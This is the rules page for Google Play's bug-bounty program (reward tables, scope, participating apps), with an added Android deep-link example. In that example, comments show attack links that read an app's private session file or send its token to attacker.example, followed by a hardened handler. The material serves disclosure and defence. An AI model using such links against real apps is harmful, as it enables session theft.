Google Play Security Reward Program Rules

Google Play Security Reward Program (GPSRP) is a vulnerability reward program offered by Google Play in collaboration with the developers of certain popular Android apps. It recognizes the contributions of security researchers who invest their time and effort in helping make apps on Google Play more secure.

The goal of the program is to identify and mitigate vulnerabilities in apps on Google Play, and keep Android users, developers and the Google Play ecosystem safe.

If you're an app developer who would like to learn more about working directly with external security researchers, please apply to join GPSRP.

Exposure Notification API and Associated Apps

GPSRP is temporarily bringing into scope the Exposure Notification API, any app on Google Play (first or third party) that uses the Exposure Notification API, and any governmental app on Google Play related to contact tracing. If you identify a vulnerability in an app of this nature, please submit the vulnerability details directly to GPSRP. Note that the non-qualifying issues listed below may, at panel discretion, still qualify for apps in this temporary scope.

Hacker “Cheat Sheet”

GPSRP focuses on identifying vulnerabilities in popular Android apps on Google Play (i.e. with 100 million or more installs, and any apps listed in scope). Please see the rules and reward criteria below for more detail.

Disclosure Process

Duplicates

A “duplicate” is a vulnerability report that is very similar or identical to a previously submitted report.

SDK and library vulnerabilities

Program Rules

Reward Criteria

Rewards are based on impact and exploitability. The following table outlines the usual rewards chosen for the most common classes of bugs, by attack vector:

1) Remote, no user interaction
2) User must follow a link; the vulnerable app is already installed
3) User must install a malicious app, or the victim app is configured in a non-default way
4) Attacker must be on the same network (e.g. MiTM)

Category                   1)         2)         3)        4)
Arbitrary code execution   $20,000    $10,000    $4,000    $1,000
Theft of sensitive data    $5,000     $3,000     $1,000    $500

The following sections outline the impacts above in more detail.

Arbitrary Code Execution (ACE)

In order to qualify, ACE must allow an attacker to run native ARM code of their choosing on a user’s device, without the user's knowledge or permission, in the same process as the affected app (the OS sandbox does not need to be bypassed).

Examples may include:

Executing arbitrary JavaScript does not qualify. Tricking a user into installing an app and executing code within that app itself does not qualify.

Theft of sensitive data

This impact category includes vulnerabilities that lead to unauthorized access to sensitive data from an app on an Android device.

For the scope of this program, sensitive data is classified as:

Location information alone does not qualify (unless combined with the ability to uniquely identify an individual by name).

Access to non-sensitive internal files of another app does not qualify.

Examples of vulnerabilities that result in this impact include, but are not limited to:

For more information on vulnerability classes, please see this PDF.

Non-qualifying issues

Known Issues

Issues already known to Google (and in the process of being mitigated or fixed) that can be used to uncover similar vulnerabilities across multiple apps in the Google Play Store are published to the known issues list. Such vulnerabilities are not deemed severe enough to warrant the default reward from Google Play (while still being relevant for the developer to fix), but may still qualify for the smaller rewards listed below.

Issue Category | Reward

Theft of sensitive data via malicious URL input: symlinks, javascript: URLs, file: URLs, content: URLs, or custom deep links. E.g. passing malicious URL input to an app so that the app processes a link of this nature (or another URL) in a way that results in access to sensitive data. | $500

Malicious URL input resulting in leaking session information. E.g. passing malicious URL input to an app so that the user is navigated to an attacker-controlled website, where the app automatically appends cookies or parameter values containing session information to the requests. (effective December 15, 2019) | $500
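To make the two Known Issues rows above and the "Theft of sensitive data" category concrete, here is an added Android example; it is not code from the GPSRP page or from any app listed on it. A deep-link handler is shown first in the vulnerable form (as comments) and then hardened. The scheme "myapp", the host "example.com", the class name and the session-token placeholder are assumptions made for the illustration.

```java
// Added illustration (not from the GPSRP page or from any listed app):
// one Android deep-link handler showing both "known issue" patterns and a
// hardened rewrite. The scheme "myapp", the host "example.com", the class
// name and SESSION_TOKEN are placeholders assumed for the example.
package com.example.deeplink;

import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.util.Collections;
import java.util.HashMap;
import java.util.Locale;
import java.util.Map;
import java.util.Set;

public class DeepLinkActivity extends Activity {
    // Hosts that may receive the app's session token (assumed for the example).
    private static final Set<String> TRUSTED_HOSTS = Collections.singleton("example.com");
    // Placeholder: a real app reads this from its own credential storage.
    private static final String SESSION_TOKEN = "placeholder-session-token";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);

        // VULNERABLE pattern (both known-issue rows), kept here only as comments:
        //   Uri target = Uri.parse(getIntent().getData().getQueryParameter("url"));
        //   Map<String, String> h = new HashMap<>();
        //   h.put("Authorization", "Bearer " + SESSION_TOKEN);
        //   settings.setAllowFileAccess(true);
        //   settings.setAllowFileAccessFromFileURLs(true);
        //   webView.loadUrl(target.toString(), h);
        // Any app on the device (or a web page, if the "myapp" scheme is BROWSABLE)
        // can then send
        //   myapp://open?url=file:///data/data/com.example.deeplink/shared_prefs/session.xml
        // to render the app's own private file in the WebView (and an attacker-controlled
        // file: page can read it with XMLHttpRequest), or
        //   myapp://open?url=https://attacker.example/
        // to receive the session token in the Authorization header.

        // HARDENED: no local file or content:// access from the WebView ...
        settings.setAllowFileAccess(false);
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);
        settings.setAllowContentAccess(false);

        // ... and every navigation, including redirects and page-initiated ones,
        // is re-validated. The String overload is used so the check also runs on
        // Android 6.0 (API 23), the program's minimum platform.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                Uri next = Uri.parse(url);
                if (isTrustedHttps(next)) {
                    view.loadUrl(next.toString(), headersFor(next));
                }
                return true; // either way, the WebView never loads it unchecked
            }
        });

        Uri data = getIntent().getData();
        String raw = (data == null) ? null : data.getQueryParameter("url");
        Uri target = (raw == null) ? null : Uri.parse(raw);
        if (!isTrustedHttps(target)) {
            finish(); // rejects file:, content:, javascript: and untrusted hosts
            return;
        }
        webView.loadUrl(target.toString(), headersFor(target));
    }

    /** Accept only an https URL whose host is on the allow-list. javascript: URLs are
     *  non-hierarchical and fail the first check; user-info ("https://example.com@evil/")
     *  and non-default ports are rejected so host confusion cannot pass. */
    static boolean isTrustedHttps(Uri u) {
        if (u == null || !u.isHierarchical()) return false;
        if (!"https".equalsIgnoreCase(u.getScheme())) return false;
        String host = u.getHost();
        if (host == null || u.getUserInfo() != null) return false;
        if (u.getPort() != -1 && u.getPort() != 443) return false;
        return TRUSTED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    /** Attach the session token only for trusted destinations, and never as a query parameter. */
    static Map<String, String> headersFor(Uri u) {
        Map<String, String> headers = new HashMap<>();
        if (isTrustedHttps(u)) {
            headers.put("Authorization", "Bearer " + SESSION_TOKEN);
        }
        return headers;
    }
}
```

When testing a handler like this, the deep link is delivered with `adb shell am start -a android.intent.action.VIEW -d '<url>'`; the hardened version should finish immediately for file:, content: and javascript: inputs, and a request to a non-allow-listed https host should arrive without the Authorization header.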

Scope

Only applications developed by Google, by participating developers (in the list below), or with 100 million or more installs are in scope. Only vulnerabilities that work on Android 6.0 devices (with the most up to date patches) and higher will qualify.

For Google-developed Android apps: please report vulnerabilities through the Google Vulnerability Reward Program or, for Chrome specifically, to the Chrome Reward Program. You can submit a reward claim here after the vulnerability is fixed.

Tier 1

Tier 1 programs have average first response times of less than 1 day, and resolution times of less than or equal to 1 month.

Organization/Developer | Package Name(s) | Submit vulnerabilities to:
Grammarly | com.grammarly.android.keyboard | https://hackerone.com/grammarly
Instacart - Client | com.instacart.client | https://hackerone.com/instacart
Instacart - Shopper | com.instacart.shopper | https://hackerone.com/instacart
JNJ Mobile | com.jnj.mocospace.android | https://hackerone.com/jnj_mobile
Line | jp.naver.line.android | https://hackerone.com/line
MagicLab | com.bumble.app | https://hackerone.com/bumble
Mail.Ru | ru.mail.cloud, ru.mail.auth.totp, ru.mail.mailapp, com.my.mail, ru.mail.calendar | https://hackerone.com/mailru
MobiSystems | com.mobisystems.msdict.embedded..., com.mobisystems.fileman, com.mobisystems.office | https://hackerone.com/mobisystems_ltd
PicsArt | com.picsart.studio | https://hackerone.com/picsart
Showmax | com.showmax.app | https://tech.showmax.com/security/
Spotify | com.spotify.music, com.spotify.tv.android, com.spotify.s4a | https://hackerone.com/spotify
Shopify | com.shopify.pos, com.shopify.mobile, com.shopify.pos.customerview | https://hackerone.com/shopify
Zomato | com.application.zomato, com.application.zomato.ordering | https://hackerone.com/zomato

Tier 2

Tier 2 programs have average first response times of less than or equal to 1 day, and/or triage times of less than or equal to 5 days, and/or resolution times of less than or equal to 3 months.

Organization/Developer | Package Name(s) | Submit vulnerabilities to:
Airbnb | com.airbnb.android | https://hackerone.com/airbnb
Dropbox | com.dropbox.android, com.dropbox.paper | https://hackerone.com/dropbox
Fitbit | com.fitbit.FitbitMobile | https://www.fitbit.com/bugbounty
Grab | com.grab.food.dax, com.grabtaxi.passenger, com.grabtaxi.driver2 | https://hackerone.com/grab
Livestream | com.livestream.livestream | https://hackerone.com/livestream
Lyft | me.lyft.android, com.lyft.android.driver | https://www.lyft.com/security
MagicLab | com.badoo.mobile | https://hackerone.com/badoo
PayPal Inc. | com.paypal.android.p2pmobile, com.paypal.here, com.paypal.merchant.client, com.xoom.android.app, com.venmo | https://hackerone.com/paypal
Priceline | com.priceline.android.negotiator | https://hackerone.com/priceline
Pinterest | com.pinterest | https://bugcrowd.com/pinterest
Snapchat | com.snapchat.android | https://hackerone.com/snapchat
Sweatcoin | in.sweatco.app | https://hackerone.com/sweatco_ltd
Tesla | com.teslamotors.tesla | https://bugcrowd.com/tesla

Tier 3

Tier 3 programs either do not meet the criteria for tier 2 or above, or do not publicly display metrics around time to first response, time to triage, or time to resolution.

Organization/Developer | Package Name(s) | Submit vulnerabilities to:
8bit Solutions LLC | com.x8bit.bitwarden | security@bitwarden.com
Alibaba | com.alibaba.aliexpresshd | https://security.alibaba.com/en/
Ayopop | com.ayopop | devops@ayopop.com
Coinbase | com.coinbase.android, org.toshi, com.coinbase.pro | https://hackerone.com/coinbase
delight.im | im.delight.letters | https://hackerone.com/delight_im
Facebook | com.facebook.katana, com.facebook.orca, com.instagram.android | https://www.facebook.com/whitehat/report/
IRCCloud | com.irccloud.android | https://hackerone.com/irccloud
Kingsoft Office | cn.wps.moffice_eng | wps_security@kingsoft.com
Language Drops | com.languagedrops.drops.international, com.languagedrops.drops.scrips.learn.write.alphabet.letters.characters.language.japanese.korean.chinese | security@languagedrops.com
Ok.Ru | ru.ok.android, ru.ok.messages, ru.ok.live | https://hackerone.com/ok
Opera | com.opera.browser, com.opera.mini.native, com.opera.touch, com.opera.app.news, com.opera.app.newslite | https://security.opera.com/report-security-issue/
Quvideo Inc | com.quvideo.xiaoying, com.quvideo.slideplus | googlesecurity@quvideo.com
Smule | com.smule.singandroid.* | android-security@smule.com
Telegram Messenger LLP | org.telegram.messenger | security@telegram.org
TikTok | com.ss.android.ugc.trill, com.zhiliaoapp.musically | https://support.tiktok.com/en/privacy-safety/reportsecurityvulnerabilities-default
Tinder | com.tinder | https://www.gotinder.com/security
VHX | tv.vhx.* | https://hackerone.com/vhx
VK.com (V Kontakte LLC) | com.vkontakte.android, com.vk.admin, com.vk.quiz | https://hackerone.com/vkcom
VLC | org.videolan.vlc | https://www.videolan.org/security/
Yandex LLC | ru.yandex.disk, ru.yandex.taxi, ru.yandex.metro, ru.yandex.music, ru.yandex.mail, ru.yandex.weatherplugin, ru.yandex.searchplugin, ru.yandex.yandexmaps, ru.yandex.market, com.yandex.browser, ru.yandex.yandexnavi | https://yandex.com/bugbounty/report/
YY Inc | com.yy.hiyo | hago@yy.com

We are unable to issue rewards to individuals who are on US sanctions lists, or who are in countries subject to US sanctions. You are responsible for any tax implications depending on your country of residency and citizenship. There may be additional restrictions on your ability to enter depending upon your local law. This is not a competition, but rather an experimental and discretionary reward program. You should understand that we can cancel the program at any time and the decision as to whether or not to pay a reward has to be entirely at our discretion. Of course, your testing must not violate any law, or disrupt or compromise any data that is not your own. To avoid potential conflicts of interest, we will not grant rewards to people employed by Google or Google Partner companies who develop code for devices covered by this program.

For Finders who participate in certain programs of particular customers, to the extent described in the Program Policies, Google may share contact information about those Finders (name, company name (if applicable) and email address) with app developers to verify that the Finder was the original reporter of an issue, and to allow those app developers to contact those Finders and interact with them directly. For any reward claim on a fixed vulnerability, Google will reach out to the affected app developer to confirm your claim and determine whether the report is eligible for a reward based on the current vulnerability criteria. If the app developer has a private program, please ask the app developer for permission before submitting a reward claim here.

Thank you for helping improve the security of the Google Play ecosystem!